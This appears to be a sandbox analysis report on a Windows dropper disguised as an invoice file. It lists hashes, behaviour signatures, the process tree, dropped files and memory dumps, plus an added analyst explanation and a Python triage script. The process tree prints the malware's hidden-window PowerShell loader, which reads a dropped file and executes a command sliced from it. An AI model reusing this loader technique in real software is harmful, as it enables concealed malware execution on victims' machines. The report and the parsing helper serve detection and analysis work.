Analysis

  • max time kernel
    95s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08-08-2024 18:47

General

  • Target

    PI_2024088_09272537_981672-HTE025783927.exe

  • Size

    580KB

  • MD5

    b3c9a65102bfef4a579036802b474af3

  • SHA1

    faf15c8d7e8337e9f3b61d1943117b4f0b8a90d0

  • SHA256

    d03270724cdd652a3c7463024b13b1d25440428a9dadd050424c9ff93a365c53

  • SHA512

    82a91edd4e823bcbbbf6bf78483b649d90d28db048934e00b1d10c67193bb30797bb6c46b098dabe6dbdd4c16716052e2df086ed7d36f781d15fe3535f4e9261

  • SSDEEP

    12288:Pq5X6hWBXTWLSGP1UrsCieglBGcmdzmT8QGFLSNqVTNy:PyTWLSGP1Ursd90RYIVZy

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PI_2024088_09272537_981672-HTE025783927.exe
    "C:\Users\Admin\AppData\Local\Temp\PI_2024088_09272537_981672-HTE025783927.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$monopolizer=Get-Content 'C:\Users\Admin\AppData\Roaming\spidskandidater\tidsbegrnsningen\Poolene.Dyr';$Geochemist11=$monopolizer.SubString(52658,3);.$Geochemist11($monopolizer)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2776
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 2128
        3⤵
        • Program crash
        PID:3652
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2776 -ip 2776
    1⤵
      PID:1792
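The PowerShell line under PID 2776 is the whole of the visible second stage: the dropper (32-bit, hence the SysWOW64 PowerShell) starts a hidden window, reads the dropped file Poolene.Dyr into one string, takes three characters at offset 52658 as a command name, and dot-sources that command (the leading `.` is PowerShell's dot-source operator, so it runs in the caller's scope) with the entire file as its argument. The report does not show the file's content, so the command name itself is unknown here; note also that PID 2776 crashed under WerFault and the Network and Malware Config sections are empty, so the second stage did not complete in this run. The following Python is an added triage helper, not part of the sandbox report: it parses a process-creation command line for the loader's parameters and replays only the SubString slice against the bytes of a dropped file, without executing anything. The telemetry lines and the stand-in blob (which places `iex` at the sliced offset) are constructed for the example; the `cp1252` decoding assumes the en-US ANSI code page that Windows PowerShell 5.1 uses for BOM-less files.

```python
"""Static triage of the PowerShell loader pattern seen in the process tree.

Added example, not part of the sandbox report. Nothing here executes the
loader: it extracts the loader's parameters from a command line and then
replays only the SubString slice on the dropped file's bytes, so an analyst
can see which command the `.$var($content)` line would dot-source.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Shape of the loader: Get-Content '<file>' ... .SubString(<off>,<len>) ... .$cmd($arg)
LOADER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'"
    r".*?\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)"
    r".*?\.\$(?P<cmdvar>\w+)\(\$(?P<argvar>\w+)\)",
    re.IGNORECASE | re.DOTALL,
)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass
class LoaderParams:
    path: str          # dropped file read by Get-Content
    offset: int        # SubString start (characters, not bytes)
    length: int        # SubString length: the command name is this long
    cmd_var: str       # variable holding the sliced command name
    arg_var: str       # variable holding the whole file, passed as the argument
    hidden_window: bool


def parse_loader(cmdline: str) -> Optional[LoaderParams]:
    """Return the loader parameters if cmdline matches the pattern, else None."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return LoaderParams(
        path=m.group("path"),
        offset=int(m.group("off")),
        length=int(m.group("len")),
        cmd_var=m.group("cmdvar"),
        arg_var=m.group("argvar"),
        hidden_window=bool(HIDDEN_RE.search(cmdline)),
    )


def command_name(blob: bytes, params: LoaderParams, encoding: str = "cp1252") -> str:
    """Replay the SubString slice on the dropped file's content without running it.

    Get-Content yields .NET strings and SubString indexes characters, so the
    bytes are decoded first. cp1252 (assumption) is what Windows PowerShell 5.1
    uses for a BOM-less file on an en-US system; pass the victim's code page
    for other locales.
    """
    text = blob.decode(encoding)
    if "\n" in text:
        # Without -Raw, Get-Content returns one string per line, so the loader's
        # single-string offset arithmetic would not apply; inspect by hand.
        raise ValueError("dropped file has line breaks; loader would not see one string")
    end = params.offset + params.length
    if len(text) < end:
        raise ValueError(f"file is {len(text)} chars, SubString needs {end}: loader would throw")
    return text[params.offset:end]


def hunt(cmdlines):
    """Run the loader pattern over process-creation command lines; return the hits."""
    return [(line, p) for line in cmdlines if (p := parse_loader(line)) is not None]


# Constructed telemetry: the loader command line from the report plus two benign lines.
SAMPLE_CMDLINES = [
    r'"powershell.exe" -windowstyle hidden "$monopolizer=Get-Content '
    r"'C:\Users\Admin\AppData\Roaming\spidskandidater\tidsbegrnsningen\Poolene.Dyr';"
    r'$Geochemist11=$monopolizer.SubString(52658,3);.$Geochemist11($monopolizer)"',
    r'"powershell.exe" -NoProfile -Command "Get-Content C:\logs\app.log | Select -Last 20"',
    r"C:\Windows\System32\svchost.exe -k netsvcs -p",
]

# Constructed stand-in for Poolene.Dyr: filler, then a 3-character command name at
# the sliced offset. The real file's content is not shown in the report.
SAMPLE_BLOB = b"A" * 52658 + b"iex" + b"B" * 64


if __name__ == "__main__":
    for line, p in hunt(SAMPLE_CMDLINES):
        print(f"loader hit: file={p.path} offset={p.offset} len={p.length} hidden={p.hidden_window}")
        print("command that would be dot-sourced:", command_name(SAMPLE_BLOB, p))
```

Run it against real telemetry by replacing SAMPLE_CMDLINES with the CommandLine field of Sysmon Event ID 1 or Windows 4688 records, and SAMPLE_BLOB with the bytes of the dropped file recovered from the sandbox; the short-file and line-break checks exist because either condition means the loader's arithmetic would not have produced a clean command name, which is worth knowing before you assume a successful second stage.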

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d33ali4h.vo5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\spidskandidater\tidsbegrnsningen\Poolene.Dyr

      Filesize

      51KB

      MD5

      0555a0781d413ef9d55ae5cf7889c536

      SHA1

      9505dc0689854f33d4124d81733aeb2cd2436327

      SHA256

      ee9ed3183437cabff4add4da2238f6ca2972d7a7257545315e60aafaf90fec4b

      SHA512

      1d7a9ea5cab36b4d598f3c448cf8bb1640b7a5e7d962d849b235e7b42523f91b98c6759b2d3d205424f97937bf90a3d0eaa082d845f2b34cad49e160e6df3d49

    • memory/2776-13-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB

    • memory/2776-27-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

      Filesize

      304KB

    • memory/2776-12-0x0000000004D50000-0x0000000004D72000-memory.dmp

      Filesize

      136KB

    • memory/2776-15-0x00000000056C0000-0x0000000005726000-memory.dmp

      Filesize

      408KB

    • memory/2776-14-0x0000000005650000-0x00000000056B6000-memory.dmp

      Filesize

      408KB

    • memory/2776-10-0x0000000004FB0000-0x00000000055D8000-memory.dmp

      Filesize

      6.2MB

    • memory/2776-8-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/2776-25-0x00000000057B0000-0x0000000005B04000-memory.dmp

      Filesize

      3.3MB

    • memory/2776-26-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

      Filesize

      120KB

    • memory/2776-11-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB

    • memory/2776-28-0x0000000006D40000-0x0000000006DD6000-memory.dmp

      Filesize

      600KB

    • memory/2776-29-0x00000000062C0000-0x00000000062DA000-memory.dmp

      Filesize

      104KB

    • memory/2776-30-0x0000000006310000-0x0000000006332000-memory.dmp

      Filesize

      136KB

    • memory/2776-31-0x0000000007390000-0x0000000007934000-memory.dmp

      Filesize

      5.6MB

    • memory/2776-9-0x0000000000FA0000-0x0000000000FD6000-memory.dmp

      Filesize

      216KB

    • memory/2776-33-0x0000000007FC0000-0x000000000863A000-memory.dmp

      Filesize

      6.5MB

    • memory/2776-35-0x0000000073340000-0x0000000073AF0000-memory.dmp

      Filesize

      7.7MB